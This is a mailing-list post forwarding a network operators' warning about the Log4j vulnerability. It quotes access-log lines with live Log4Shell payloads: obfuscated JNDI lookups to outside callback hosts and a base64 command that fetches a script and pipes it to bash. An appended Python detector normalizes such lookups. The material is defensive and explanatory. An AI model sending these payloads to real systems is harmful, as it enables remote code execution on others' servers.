General list for discussing Bufferbloat
From: Dave Taht <dave.taht@gmail.com>
To: bloat <bloat@lists.bufferbloat.net>
Subject: [Bloat] Fwd: Log4j mitigation
Date: Mon, 13 Dec 2021 05:56:36 -0800
Message-ID: <CAA93jw7mbD2m8T_NdXy5-Vg_s7WVRhWNJ1sF2ZxW5Wc5AkWRiQ@mail.gmail.com>
In-Reply-To: <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>

For those of you losing sleep over the Java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat-related websites,
haven't got a single thing written in Java, and I lost 3 weeks of my
life over Christmas to Spectre, and several weeks per year - and
usually, right around Christmas! - coping with other CVEs.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean@ddostest.me>
Cc: <nanog@nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
in headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
be soon.

We have been seeing things like this since the 10th of Dec. And this is
only a typical Apache log file for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}



-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC
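As an added example (not part of this thread or of any project's code), the following Python normalizes the obfuscated lookup forms visible in the log excerpt above (`${lower:x}`, `${::-x}` default-value tricks, percent-encoded braces, and lookups such as `${hostName}` that cannot be evaluated offline) and reports the scheme and host of every `${jndi:...}` lookup left behind. The log lines are constructed, using RFC 5737 addresses and an example.net callback host rather than the indicators from the mail, and the offline lookup resolution is an approximation that is assumed to be sufficient for detection.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (no nested "${" inside); the jndi: lookup itself is
# skipped so that it survives normalization and can be reported afterwards.
INNER = re.compile(r"\$\{(?!jndi:)([^${}]*)\}", re.IGNORECASE)
JNDI = re.compile(r'\$\{jndi:([a-z]+)://([^/}\s"]+)', re.IGNORECASE)

# Constructed access-log lines modelled on the patterns in the excerpt above
# (RFC 5737 addresses and an example.net callback host, not real indicators).
SAMPLE_LINES = [
    'GET /?x=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.10:12344/Basic/Command} HTTP/1.1" 200 -',
    'GET / HTTP/1.1" 200 - "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.callback.example.net}"',
    'GET /$%7Bjndi:dns://198.51.100.7/securityscan-http80%7D HTTP/1.1" 301 281',
    'GET / HTTP/1.1" 200 - "-" "${${lower:jNdI}:rmi://203.0.113.20:1099/obj}"',
    'GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def _resolve(m):
    """Approximate one Log4j lookup offline (assumed good enough for detection)."""
    body = m.group(1)
    head, _, rest = body.partition(":")
    if head.lower() == "lower":
        return rest.lower()
    if head.lower() == "upper":
        return rest.upper()
    if ":-" in body:                 # ${key:-default}: ${::-j} becomes "j"
        return body.split(":-", 1)[1]
    return "<" + body + ">"          # hostName, env, ... cannot be resolved here


def normalize(text, max_rounds=20):
    """Percent-decode, then expand nested lookups inside-out until stable."""
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, unquote(text))
        if new == text:
            return text
        text = new
    return text


def find_jndi(line):
    """Return (scheme, host) for every jndi lookup hidden in one log line."""
    return [(s.lower(), h) for s, h in JNDI.findall(normalize(line))]


def scan_lines(lines):
    """Return (line_index, scheme, host) for every hit across an access log."""
    return [(i, s, h) for i, line in enumerate(lines) for s, h in find_jndi(line)]
```

Running `scan_lines(SAMPLE_LINES)` flags the first four constructed lines and leaves the plain request alone; the reported host is the callback the logging process would be made to contact, which is what a defender wants to block or hunt for.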
